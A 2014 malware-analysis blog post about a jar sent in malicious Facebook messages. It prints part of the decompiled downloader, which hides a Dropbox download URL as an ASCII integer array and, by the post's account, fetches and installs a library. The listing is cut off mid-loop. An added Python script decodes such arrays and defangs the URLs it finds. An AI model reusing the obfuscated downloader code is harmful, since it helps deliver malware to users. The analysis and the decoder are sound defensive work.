Showing posts from May, 2014

Malware Analysis of Malicious Facebook Message

If you have recently received a message like the one shown below, with "lol" and a zip file attached, please do not try to open the jar file inside it.



So what does this jar file contain?
It is code that downloads a dynamically loadable library from the internet and installs it on the system. Let's have a look at the source code of the jar file, which I decompiled.


import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.io.PrintStream;
import java.net.HttpURLConnection;
import java.net.URI;
import java.net.URL;
import java.nio.file.CopyOption;
import java.nio.file.Files;
import java.nio.file.Paths;

public class IMG_00111
{
  public static String XJJXMWJJQDBIAEHVEBZ()
  {
    int[] arrayOfInt = { 104, 116, 116, 112, 115, 58, 47, 47, 100, 108, 46, 100, 114, 111, 112, 98, 111, 120, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 115, 47 };

    StringBuilder localStringBuilder = new StringBuilder(arrayOfInt.length);
    for (int i = 0; i < arrayOfInt.length; i+…
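
The method above hides its string as an array of ASCII codes, so a plain string search over the jar finds nothing. As an added triage example (not part of the original post or the sample), this Python sketch recovers such strings from decompiled source without running the jar; the function names, the second array in the sample and the defanging step are assumptions made for illustration.

```python
import re

# Matches decompiled declarations such as: int[] arrayOfInt = { 104, 116, ... };
INT_ARRAY_RE = re.compile(r"int\[\]\s+(\w+)\s*=\s*\{([^}]*)\}")

def decode_int_arrays(java_source, min_len=4):
    """Return (variable, text) for every int[] literal made only of printable ASCII."""
    results = []
    for name, body in INT_ARRAY_RE.findall(java_source):
        tokens = [t.strip() for t in body.split(",") if t.strip()]
        try:
            values = [int(t, 0) for t in tokens]  # accepts decimal and 0x.. literals
        except ValueError:
            continue  # elements are expressions or identifiers, not plain literals
        if len(values) < min_len:
            continue
        # Real numeric data rarely stays inside the printable range for its whole length.
        if all(0x20 <= v <= 0x7E for v in values):
            results.append((name, "".join(map(chr, values))))
    return results

def defang(text):
    """Rewrite a decoded URL so it cannot be clicked or auto-linked in a report."""
    return text.replace("http", "hxxp", 1).replace(".", "[.]")

# First array copied from the decompiled class above; the second is constructed
# to show that ordinary numeric arrays are ignored.
SAMPLE = """
public static String XJJXMWJJQDBIAEHVEBZ()
{
  int[] arrayOfInt = { 104, 116, 116, 112, 115, 58, 47, 47, 100, 108, 46, 100,
    114, 111, 112, 98, 111, 120, 117, 115, 101, 114, 99, 111, 110, 116, 101,
    110, 116, 46, 99, 111, 109, 47, 115, 47 };
  int[] sizes = { 1, 2, 1024, 65536 };
"""

if __name__ == "__main__":
    for variable, text in decode_int_arrays(SAMPLE):
        print(variable, "->", defang(text))
```

The array in the post decodes to a download URL prefix on Dropbox's content host, which is where the jar fetches the library from.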